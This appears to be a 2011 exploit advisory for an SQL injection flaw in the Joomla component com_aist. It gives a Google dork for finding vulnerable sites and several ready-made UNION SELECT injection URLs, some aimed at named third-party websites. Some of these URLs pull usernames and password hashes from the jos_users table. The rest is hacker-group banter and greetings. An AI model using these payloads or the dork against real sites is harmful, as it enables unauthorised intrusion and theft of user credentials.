The Joomla Aist component suffers from a remote SQL injection vulnerability.
9d9f286edaf2182cb98d78b3bedbeb5b5d2751c8d631a710c523feee4aa45339
| Joomla Component com_aist SQL Injection Vulnerability |
#[~] Author : the_cyber_nuxbie
#[~] Bugs Founder : g3mb3lz_YCL Feat Nuxbie
#[~] Home : www.thecybernuxbie.com
#[~] E-mail : nuxbie@sekuritionline.net
#[~] Found : 28 April 2011.
#[~] Tested On : Windows 7 Ultimate 32bit. (bajakan).
#[!] Google Dork : inurl:"com_aist"
______________________________________________________________
\\\:///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo----------------------------------------------------
the_cyber_nuxbie w@s H3re...
I'am NOT Sampah...!!!
I'am NOT h4ck3r...!!!
I'am a Newbie trala..la..la..la..la...
Bruakakakakakakak... :-D
---------------Ooooo--------------------------------------------------
( )
ooooO ) /
( ) (_/
\ (
\_)
#[~] Exploited:
../public_html/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1%3D2+UNION+SELECT+1%2C2%2C3%2C4%2CVERSION%28%29%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36
- P.o.C:
http://kmttmp.ax3.net/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1%3D2+UNION+SELECT+1%2C2%2C3%2C4%2Cgroup_concat%28username%2Cpassword%2C0x3a%29%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36+from+jos_users--
http://www.spo-ntek.ru/joomla/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1%3D2+UNION+SELECT+1%2C2%2C3%2C4%2Cgroup_concat%28username%2C0x3a%2Cactivation%29g3mb3lzfeatnuxbie%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36+from+jos_users--
http://job.skags.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1%3D2+UNION+SELECT+1%2C2%2C3%2C4%2CVERSION%28%29%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36
Special Matur Nuwun To:
g3mb3lz_YCL <--- Yang telah menemaniku mencari sesuatu... :-D
- Shout & Greetz:
All Member & Staff YogyaCarderLink. | www.yogyacarderlink.web.id
All Member & Staff SekuritiOnline | www.sekuritionline.net
All Member & Staff YogyaFamilyCode | www.xcode.or.id
All Member & Staff Devilzc0de | www.devilzc0de.org
All Member & Staff Hacker-Newbie | www.hacker-newbie.org
All Member & Staff ECHO | www.echo.or.id
All Member & Staff WhiteCyber | www.whitecyber.net
All Member & Staff MuslemHacker | www.muslimhackers.net
All Member & Staff BinusHacker | www.binushacker.net
All Member & Staff Jasakom | www.jasakom.com
All Member & Staff IndonesianDefacer | www.indonesiandefacer.org
All Member & Staff IndonesianCoder | www.indonesiancoder.com
All Member & Staff MagelangCyber | www.magelangcyber.web.id
All Member & Staff Jatim-Crew | www.jatimcrew.org
All Member & Staff Fast-Hacker | www.fasthacker.org
And all forum / community cyber se-antero indonesia. :-D
,etc...
Sorry masbro...
Kami masih nyubi... :-D
Jangan menghina kami donk... :-(
Bruakakakakakak... :-D
-=[ g3mb3lz_YCL Feat Nuxbie ]=-
- April 28 2011, GMT +03:35 Solo Raya, Indonesia.
===================================================